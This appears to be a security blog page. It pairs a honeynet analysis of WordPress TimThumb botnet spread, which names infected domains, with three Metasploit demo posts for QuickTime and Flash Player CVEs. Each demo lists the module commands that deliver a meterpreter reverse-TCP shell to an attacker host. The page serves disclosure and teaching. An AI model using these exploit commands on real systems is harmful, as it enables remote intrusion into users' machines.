WordPress TimThumb Botnets Spreads Status – second edition

Security visualization, Various,

Since the discovery of the WordPress TimThumb vulnerability in August 2011 by Mark Maunder, the vulnerability has been used as botnet recruitment vector, and has now spread in multiple botnets. Hundreds of WordPress blogs have been hacked, allowing potential infection of the blogs visitors, diffusion of spam and phishing campaign, DDoS, hack of other web sites (such as About.us domain name registrar), etc, etc. Some of these infected WordPress were controlled by well-known C&C servers used and shared by black hats from around the world.

Six month after the discovery of the vulnerability I had made a first status on the WordPress TimThumb spread with some nice visualizations and graphs representing the botnet activities.

We are soon one year after the discovery of the vulnerability and a second status on the WordPress TimThumb botnets could be done. Are the botnets still active, are less WordPress blogs vulnerable, is the pick of spread over ? We will try, through an analysis of all the WordPress TimThumb vulnerability exploitation attempts against our Honey Net, to answer these questions. The data’s collected through our Honey Net are representing only a small part of the real activity of the WordPress TimThumb botnets, but these data’s could also represent an extrapolation of the real activities.

List of all detected infected domains

You can find in the following table the complete list of all detected infected domains how were called during the WordPress TimThumb RFI attack, with the domain associated IP address, the country where the blog were hosted, the number of distinct source IPs how have call the related domain during the RFI attack and the live time of the domain name.

We have a total of 473 affected domains compared to the 202 six month before. This number demonstrates that 11 months after the vulnerability discovery the botnet is still in activity and that the number of infected domains are still important. “blogger.com.dollhousedelights.com“, hosted in Taiwan (IP has moved from Vietnam to Taiwan), was the affected domain how was called by the much more distinct source IPs (265), followed by “picasa.com.xpl.be” with 167 distinct source IPs, and at the third place “blogger.com.midislandrental.com” with 110 distinct source IPs.

picasa.com.xpl.be” has a live time of 238 days, followed by “upload.wikimedia.org.penguinet.co.ke” with a live time of 218 days, “blogger.com.sabrosaserver.com” with 211 days, “wordpress.com.airatrip.com” with 186 days and “flickr.com.bpmohio.com” with 179 days.

29 domains have a live time above 100 days and 86 domains have a live time between 30 days and 100 days.

Infected blogs countries repartition

You can find in the following graphs (Chart1Chart2) the geographically repartition of the infected blogs.

We have a total of 45 different countries for 473 affected domains. United States is in first position with 57% (284) of all infected blogs, followed by Canada with 5.2% (26), United Kingdom with each 4.4% (22) of all infected blogs. US is still in the first position (+155) of infected WordPress and we can see that the infected countries are quiet the same as six months ago.

Infected blogs countries repartition by number of source IPs

You can find in the following graphs (Chart3Chart4) the geographically repartition of the infected blogs by number of distinct source IPs how have call the infected blogs.

We have a total of 3340 distinct source IPs for 473 affected domains and 45 different hosting countries. United States is in first position with 44.3% (1480), followed by Vietnam with 8.4% (279), Chile with 4.3% (143), Romania with 4.3% (142) and Australia with 3.6% (119). US is in the first position (+639) of infected WordPress, Vietnam in second position but source IPs have drastically decrease compared to six months ago (only +36).

Timeline by day of infected blogs calls and source IPs

You can find in the following timeline (Chart5) a representation by day of the infected blogs number calls and source IPs.

From January 2012 to April 2012 the botnet spread has constantly decrease in term of number of affected hosts and source IPs, but in April 2012 the botnet has suddenly increase his activity. November 2011 was the most active month for the number of source IPs.

Geographic timeline by day of all source IPs

In this geographic time map we’re loading data’s from a Google Spreadsheet (published here). These data’s are coming from our HoneyNet and are representing the geographic WordPress TimThumb Botnet activities from 15-09-2011 to 01-07-2012.

Conclusion

WordPress TimThumb botnets, one year after the vulnerability discovery, is still continuing to infect new blogs, the pick of spread is over since November 2011. My personal opinion is that we will steal continue to hear about these botnets during second part of 2012.

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

CVE-2011-2110 / APSB11-18 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2011-06-14
Details of the vulnerability provided the 2011-10-09
Metasploit PoC provided the 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. This is the same vulnerability that was used for attacks against Korean based organizations. Specifically, this issue occurs when indexing an array using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered exploited in the wild
Public release of the vulnerability by the vendor the 2012-05-04
Details of the vulnerability provided the 2012-05-06
Metasploit PoC provided the 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid